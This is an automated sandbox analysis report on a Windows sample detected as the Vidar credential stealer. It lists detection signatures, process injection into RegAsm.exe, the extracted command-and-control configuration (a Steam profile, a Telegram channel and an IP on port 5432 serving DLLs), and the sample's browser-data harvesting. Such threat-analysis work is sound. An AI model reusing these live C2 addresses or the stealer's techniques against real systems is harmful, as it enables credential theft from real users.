Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1453785
MD5:7dc8189f70cc34e18ea7af8fdeac4142
SHA1:8cb698efdf5971e0805dd0f0fb0457315490c777
SHA256:a3608a51db9df14c42f8c6e37ac49969de70b4be0862d82b5823c00aed395f9d
Tags:exe
Infos:

Detection

Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected Powershell download and execute
Yara detected Vidar stealer
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Injects a PE file into a foreign processes
Machine Learning detection for sample
Searches for specific processes (likely to inject)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
PE / OLE file has an invalid certificate
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • file.exe (PID: 6360 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 7DC8189F70CC34E18EA7AF8FDEAC4142)
    • RegAsm.exe (PID: 2780 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
  • cleanup
{"C2 url": ["https://steamcommunity.com/profiles/76561199698764354", "https://t.me/r8z0l"], "Botnet": "8bd2ac5f1dd228859ac690a79c0bde71"}
SourceRuleDescriptionAuthorStrings
00000000.00000002.2070870185.0000000001023000.00000004.00000001.01000000.00000003.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
    00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
      00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmpINDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulationDetects executables containing potential Windows Defender anti-emulation checksditekSHen
      • 0x231f0:$s1: JohnDoe
      • 0x231e8:$s2: HAL9TH
      Process Memory Space: file.exe PID: 6360JoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
        Process Memory Space: file.exe PID: 6360JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
          Click to see the 4 entries
          SourceRuleDescriptionAuthorStrings
          2.2.RegAsm.exe.400000.0.raw.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
            2.2.RegAsm.exe.400000.0.raw.unpackINDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulationDetects executables containing potential Windows Defender anti-emulation checksditekSHen
            • 0x231f0:$s1: JohnDoe
            • 0x231e8:$s2: HAL9TH
            2.2.RegAsm.exe.400000.0.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
              2.2.RegAsm.exe.400000.0.unpackINDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulationDetects executables containing potential Windows Defender anti-emulation checksditekSHen
              • 0x225f0:$s1: JohnDoe
              • 0x225e8:$s2: HAL9TH
              0.2.file.exe.ff0000.0.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                Click to see the 1 entries
                No Sigma rule has matched
                No Snort rule has matched

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: https://116.202.190.18:5432/softokn3.dllPAvira URL Cloud: Label: malware
                Source: https://116.202.190.18/Avira URL Cloud: Label: malware
                Source: https://116.202.190.18:5432/softokn3.dllAvira URL Cloud: Label: malware
                Source: https://116.202.190.18:5432/msvcp140.dlldgeAvira URL Cloud: Label: malware
                Source: https://116.202.190.18:5432/vcruntime140.dllIQ=EAvira URL Cloud: Label: malware
                Source: https://116.202.190.18:5432/softokn3.dllZAvira URL Cloud: Label: malware
                Source: https://116.202.190.18:5432/freebl3.dllEdgeAvira URL Cloud: Label: malware
                Source: https://116.202.190.18:5432/sqls.dllAvira URL Cloud: Label: malware
                Source: https://116.202.190.18:5432/freebl3.dllaAvira URL Cloud: Label: malware
                Source: https://116.202.190.18:5432/reebl3.dllAvira URL Cloud: Label: malware
                Source: https://116.202.190.18:5432/mozglue.dllEdgeAvira URL Cloud: Label: malware
                Source: https://t.me/r8z0lAvira URL Cloud: Label: malware
                Source: https://116.202.190.18:5432/freebl3.dllAvira URL Cloud: Label: malware
                Source: https://116.202.190.18:5432/vcruntime140.dll9Avira URL Cloud: Label: malware
                Source: https://116.202.190.18:5432/nss3.dllAvira URL Cloud: Label: malware
                Source: https://116.202.190.18:5432/mozglue.dllsAvira URL Cloud: Label: malware
                Source: https://116.202.190.18:5432/vcruntime140.dllserAvira URL Cloud: Label: malware
                Source: https://116.202.190.18:5432/vcruntime140.dll/Avira URL Cloud: Label: malware
                Source: https://116.202.190.18:5432/sqls.dllxAvira URL Cloud: Label: malware
                Source: https://116.202.190.18:5432/vcruntime140.dllAvira URL Cloud: Label: malware
                Source: https://116.202.190.18:5432Avira URL Cloud: Label: malware
                Source: https://116.202.190.18:5432/Avira URL Cloud: Label: malware
                Source: https://116.202.190.18:5432/.190.18:5432/Avira URL Cloud: Label: malware
                Source: https://116.202.190.18:5432/oftAvira URL Cloud: Label: malware
                Source: https://116.202.190.18:5432/MyAvira URL Cloud: Label: malware
                Source: https://116.202.190.18:5432/nss3.dllOAvira URL Cloud: Label: malware
                Source: https://116.202.190.18:5432/mozglue.dllAvira URL Cloud: Label: malware
                Source: https://116.202.190.18:5432/softokn3.dllOMhAvira URL Cloud: Label: malware
                Source: https://116.202.190.18:5432/nss3.dllftAvira URL Cloud: Label: malware
                Source: https://116.202.190.18:5432/msvcp140.dllAvira URL Cloud: Label: malware
                Source: https://116.202.190.18:5432/vcruntime140.dllUserAvira URL Cloud: Label: malware
                Source: https://116.202.190.18:5432/ngAvira URL Cloud: Label: malware
                Source: https://116.202.190.18:5432/softokn3.dlldgeAvira URL Cloud: Label: malware
                Source: https://steamcommunity.com/profiles/76561199698764354Avira URL Cloud: Label: malware
                Source: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmpMalware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199698764354", "https://t.me/r8z0l"], "Botnet": "8bd2ac5f1dd228859ac690a79c0bde71"}
                Source: file.exeReversingLabs: Detection: 26%
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: file.exeJoe Sandbox ML: detected
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00406DE2 CryptUnprotectData,LocalAlloc,LocalFree,2_2_00406DE2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040245C memset,CryptStringToBinaryA,CryptStringToBinaryA,CryptStringToBinaryA,2_2_0040245C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00411B94 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,2_2_00411B94
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00406D7F CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,2_2_00406D7F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00408E1E memset,lstrlenA,CryptStringToBinaryA,memcpy,lstrcat,lstrcat,2_2_00408E1E
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.5:49708 version: TLS 1.2
                Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: RegAsm.exe, 00000002.00000002.3327352173.0000000015922000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.2.dr
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0100D5B1 FindFirstFileExW,0_2_0100D5B1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040D2FF _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_0040D2FF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040C0F8 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,2_2_0040C0F8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00401162 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose,2_2_00401162
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040A17A _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,2_2_0040A17A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00417295 _EH_prolog,GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlenA,lstrlenA,2_2_00417295
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040A595 _EH_prolog,StrCmpCA,FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,2_2_0040A595
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040B616 _EH_prolog,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,FindNextFileA,FindClose,2_2_0040B616
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004176DE _EH_prolog,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,2_2_004176DE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00416824 _EH_prolog,wsprintfA,FindFirstFileA,memset,memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcat,strtok_s,memset,lstrcat,PathMatchSpecA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,strtok_s,FindNextFileA,FindClose,2_2_00416824
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040AC07 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,2_2_0040AC07
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00416EF1 _EH_prolog,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,2_2_00416EF1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00416C71 _EH_prolog,GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpy,lstrcpy,lstrcpy,lstrlenA,2_2_00416C71
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior

                Networking

                barindex
                Source: Malware configuration extractorURLs: https://steamcommunity.com/profiles/76561199698764354
                Source: Malware configuration extractorURLs: https://t.me/r8z0l
                Source: global trafficTCP traffic: 192.168.2.5:49709 -> 116.202.190.18:5432
                Source: global trafficHTTP traffic detected: GET /r8z0l HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
                Source: Joe Sandbox ViewIP Address: 149.154.167.99 149.154.167.99
                Source: Joe Sandbox ViewIP Address: 149.154.167.99 149.154.167.99
                Source: Joe Sandbox ViewASN Name: TELEGRAMRU TELEGRAMRU
                Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                Source: unknownTCP traffic detected without corresponding DNS query: 116.202.190.18
                Source: unknownTCP traffic detected without corresponding DNS query: 116.202.190.18
                Source: unknownTCP traffic detected without corresponding DNS query: 116.202.190.18
                Source: unknownTCP traffic detected without corresponding DNS query: 116.202.190.18
                Source: unknownTCP traffic detected without corresponding DNS query: 116.202.190.18
                Source: unknownTCP traffic detected without corresponding DNS query: 116.202.190.18
                Source: unknownTCP traffic detected without corresponding DNS query: 116.202.190.18
                Source: unknownTCP traffic detected without corresponding DNS query: 116.202.190.18
                Source: unknownTCP traffic detected without corresponding DNS query: 116.202.190.18
                Source: unknownTCP traffic detected without corresponding DNS query: 116.202.190.18
                Source: unknownTCP traffic detected without corresponding DNS query: 116.202.190.18
                Source: unknownTCP traffic detected without corresponding DNS query: 116.202.190.18
                Source: unknownTCP traffic detected without corresponding DNS query: 116.202.190.18
                Source: unknownTCP traffic detected without corresponding DNS query: 116.202.190.18
                Source: unknownTCP traffic detected without corresponding DNS query: 116.202.190.18
                Source: unknownTCP traffic detected without corresponding DNS query: 116.202.190.18
                Source: unknownTCP traffic detected without corresponding DNS query: 116.202.190.18
                Source: unknownTCP traffic detected without corresponding DNS query: 116.202.190.18
                Source: unknownTCP traffic detected without corresponding DNS query: 116.202.190.18
                Source: unknownTCP traffic detected without corresponding DNS query: 116.202.190.18
                Source: unknownTCP traffic detected without corresponding DNS query: 116.202.190.18
                Source: unknownTCP traffic detected without corresponding DNS query: 116.202.190.18
                Source: unknownTCP traffic detected without corresponding DNS query: 116.202.190.18
                Source: unknownTCP traffic detected without corresponding DNS query: 116.202.190.18
                Source: unknownTCP traffic detected without corresponding DNS query: 116.202.190.18
                Source: unknownTCP traffic detected without corresponding DNS query: 116.202.190.18
                Source: unknownTCP traffic detected without corresponding DNS query: 116.202.190.18
                Source: unknownTCP traffic detected without corresponding DNS query: 116.202.190.18
                Source: unknownTCP traffic detected without corresponding DNS query: 116.202.190.18
                Source: unknownTCP traffic detected without corresponding DNS query: 116.202.190.18
                Source: unknownTCP traffic detected without corresponding DNS query: 116.202.190.18
                Source: unknownTCP traffic detected without corresponding DNS query: 116.202.190.18
                Source: unknownTCP traffic detected without corresponding DNS query: 116.202.190.18
                Source: unknownTCP traffic detected without corresponding DNS query: 116.202.190.18
                Source: unknownTCP traffic detected without corresponding DNS query: 116.202.190.18
                Source: unknownTCP traffic detected without corresponding DNS query: 116.202.190.18
                Source: unknownTCP traffic detected without corresponding DNS query: 116.202.190.18
                Source: unknownTCP traffic detected without corresponding DNS query: 116.202.190.18
                Source: unknownTCP traffic detected without corresponding DNS query: 116.202.190.18
                Source: unknownTCP traffic detected without corresponding DNS query: 116.202.190.18
                Source: unknownTCP traffic detected without corresponding DNS query: 116.202.190.18
                Source: unknownTCP traffic detected without corresponding DNS query: 116.202.190.18
                Source: unknownTCP traffic detected without corresponding DNS query: 116.202.190.18
                Source: unknownTCP traffic detected without corresponding DNS query: 116.202.190.18
                Source: unknownTCP traffic detected without corresponding DNS query: 116.202.190.18
                Source: unknownTCP traffic detected without corresponding DNS query: 116.202.190.18
                Source: unknownTCP traffic detected without corresponding DNS query: 116.202.190.18
                Source: unknownTCP traffic detected without corresponding DNS query: 116.202.190.18
                Source: unknownTCP traffic detected without corresponding DNS query: 116.202.190.18
                Source: unknownTCP traffic detected without corresponding DNS query: 116.202.190.18
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004041B2 _EH_prolog,GetProcessHeap,RtlAllocateHeap,InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,2_2_004041B2
                Source: global trafficHTTP traffic detected: GET /r8z0l HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
                Source: global trafficDNS traffic detected: DNS query: t.me
                Source: global trafficDNS traffic detected: DNS query: 198.187.3.20.in-addr.arpa
                Source: file.exeString found in binary or memory: http://aia.entrust.net/ts1-chain256.cer01
                Source: file.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                Source: file.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                Source: file.exeString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                Source: file.exeString found in binary or memory: http://crl.entrust.net/ts1ca.crl0
                Source: file.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                Source: file.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                Source: file.exeString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                Source: RegAsm.exe, 00000002.00000002.3326265923.0000000001193000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                Source: RegAsm.exe, 00000002.00000002.3326265923.00000000011C9000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.2.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                Source: file.exeString found in binary or memory: http://ocsp.digicert.com0
                Source: file.exeString found in binary or memory: http://ocsp.digicert.com0A
                Source: file.exeString found in binary or memory: http://ocsp.entrust.net02
                Source: file.exeString found in binary or memory: http://ocsp.entrust.net03
                Source: file.exeString found in binary or memory: http://www.digicert.com/CPS0
                Source: file.exeString found in binary or memory: http://www.entrust.net/rpa03
                Source: RegAsm.exe, 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3327352173.0000000015922000.00000004.00000020.00020000.00000000.sdmp, sqls[1].dll.2.drString found in binary or memory: http://www.sqlite.org/copyright.html.
                Source: RegAsm.exe, 00000002.00000002.3326444422.00000000011EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://116.202.190.18/
                Source: RegAsm.exe, 00000002.00000002.3326265923.0000000001193000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://116.202.190.18:5432
                Source: RegAsm.exe, 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3326444422.00000000011EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3326684704.0000000001397000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3326265923.0000000001193000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://116.202.190.18:5432/
                Source: RegAsm.exe, 00000002.00000002.3326444422.00000000011EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://116.202.190.18:5432/.190.18:5432/
                Source: RegAsm.exe, 00000002.00000002.3326684704.0000000001397000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://116.202.190.18:5432/My
                Source: RegAsm.exe, 00000002.00000002.3326524144.000000000129E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://116.202.190.18:5432/freebl3.dll
                Source: RegAsm.exe, 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://116.202.190.18:5432/freebl3.dllEdge
                Source: RegAsm.exe, 00000002.00000002.3326524144.000000000129E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://116.202.190.18:5432/freebl3.dlla
                Source: RegAsm.exe, 00000002.00000002.3326524144.000000000129E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://116.202.190.18:5432/mozglue.dll
                Source: RegAsm.exe, 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://116.202.190.18:5432/mozglue.dllEdge
                Source: RegAsm.exe, 00000002.00000002.3326524144.000000000129E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://116.202.190.18:5432/mozglue.dlls
                Source: RegAsm.exe, 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3326524144.0000000001280000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://116.202.190.18:5432/msvcp140.dll
                Source: RegAsm.exe, 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://116.202.190.18:5432/msvcp140.dlldge
                Source: RegAsm.exe, 00000002.00000002.3326684704.0000000001397000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://116.202.190.18:5432/ng
                Source: RegAsm.exe, 00000002.00000002.3326265923.00000000011C9000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3326524144.000000000129E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://116.202.190.18:5432/nss3.dll
                Source: RegAsm.exe, 00000002.00000002.3326684704.0000000001397000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://116.202.190.18:5432/nss3.dllO
                Source: RegAsm.exe, 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://116.202.190.18:5432/nss3.dllft
                Source: RegAsm.exe, 00000002.00000002.3326444422.00000000011EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://116.202.190.18:5432/oft
                Source: RegAsm.exe, 00000002.00000002.3326444422.00000000011EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://116.202.190.18:5432/reebl3.dll
                Source: RegAsm.exe, 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3326444422.00000000011EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3326524144.0000000001280000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://116.202.190.18:5432/softokn3.dll
                Source: RegAsm.exe, 00000002.00000002.3326524144.0000000001280000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://116.202.190.18:5432/softokn3.dllOMh
                Source: RegAsm.exe, 00000002.00000002.3326524144.0000000001280000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://116.202.190.18:5432/softokn3.dllP
                Source: RegAsm.exe, 00000002.00000002.3326444422.00000000011EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://116.202.190.18:5432/softokn3.dllZ
                Source: RegAsm.exe, 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://116.202.190.18:5432/softokn3.dlldge
                Source: RegAsm.exe, 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3326524144.000000000129E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://116.202.190.18:5432/sqls.dll
                Source: RegAsm.exe, 00000002.00000002.3326524144.000000000129E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://116.202.190.18:5432/sqls.dllx
                Source: RegAsm.exe, 00000002.00000002.3326524144.0000000001268000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3326444422.00000000011EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://116.202.190.18:5432/vcruntime140.dll
                Source: RegAsm.exe, 00000002.00000002.3326444422.00000000011EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://116.202.190.18:5432/vcruntime140.dll/
                Source: RegAsm.exe, 00000002.00000002.3326444422.00000000011EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://116.202.190.18:5432/vcruntime140.dll9
                Source: RegAsm.exe, 00000002.00000002.3326444422.00000000011EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://116.202.190.18:5432/vcruntime140.dllIQ=E
                Source: RegAsm.exe, 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://116.202.190.18:5432/vcruntime140.dllUser
                Source: RegAsm.exe, 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://116.202.190.18:5432/vcruntime140.dllser
                Source: RegAsm.exe, 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://116.202.190.18:5432A
                Source: RegAsm.exe, 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://116.202.190.18:5432AMicrosoft
                Source: RegAsm.exe, 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://116.202.190.18:5432Content-Disposition:
                Source: RegAsm.exe, 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://116.202.190.18:5432c84cgle
                Source: RegAsm.exe, 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://116.202.190.18:5432fold
                Source: RegAsm.exe, 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://116.202.190.18:5432ing
                Source: RegAsm.exe, 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://116.202.190.18:5432l
                Source: FBKECF.2.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: FBKECF.2.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: FBKECF.2.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: FBKECF.2.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: FBKECF.2.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: FBKECF.2.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: FBKECF.2.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
